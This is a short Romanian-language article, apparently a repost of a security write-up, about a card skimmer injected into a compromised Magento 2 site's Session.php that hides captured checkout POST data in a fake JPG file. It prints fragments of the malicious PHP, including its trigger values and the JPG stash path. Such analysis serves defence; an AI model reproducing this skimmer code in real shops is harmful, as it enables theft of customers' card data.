magento 2 skimmerii salveaza in jpg cardurile de credit

Info Utile – Magento 2: Skimmerii salvează în JPG cardurile de credit

Actorii răi folosesc adesea tehnici creative pentru a ascunde un comportament rău intenționat și pentru a culege informații sensibile de pe site-urile de comerț electronic .

O investigație recentă pentru un site Web Magento 2 compromis a dezvăluit o injecție rău intenționată care captura date de solicitare POST de la vizitatorii site-ului. Situat pe pagina de plată, s-a observat că codifică datele capturate înainte de a le salva într-un fișier .JPG.

Comportament de injecție rău intenționat

Următorul cod PHP a fost găsit injectat în fișier ./vendor/magento/module-customer/Model/Session.php. Pentru a încărca restul codului rău intenționat în mediul compromis, funcția getAuthenticates este creată și apelată.

...
	public function getAuthenticates($request)
	{
    	if(empty($request->getPostValue('Custom'.'Method')))
        	return $this;
    	$docroot = BP . "/";
    	$sid = $request->getPostValue('Custom'.'Method');
    	if($sid != 'init' && $sid != 'LnByg' && $sid != 'LnByd') return $this;

Codul creează și fișierul imagine (pub / media / tmp / design / file / default_luma_logo.jpg), pe care îl folosește pentru a stoca orice date capturate. Această caracteristică îi permite atacatorului să acceseze și să descarce cu ușurință informațiile furate după bunul plac, ascunzându-le într-un JPG aparent benign.

$docroot = BP . "/";
    	$sid = $request->getPostValue('Custom'.'Method');
    	if($sid != 'init' && $sid != 'LnByg' && $sid != 'LnByd') return $this;
    	$fname = $docroot.'pub/media/tmp/design/file/default_luma_logo.jpg';
    	try {
        	if(!file_exists($fname)){
            	$fhandle = fopen($fname,'w');fclose($fhandle);
        	}
        	$fhandle = fopen($fname,'r');$content = @fread($fhandle,filesize($fname));fclose($fhandle);
...

Recoltarea detaliilor cardului de credit…

Continuarea aici: Magento 2: Skimmerii salvează în JPG cardurile de credit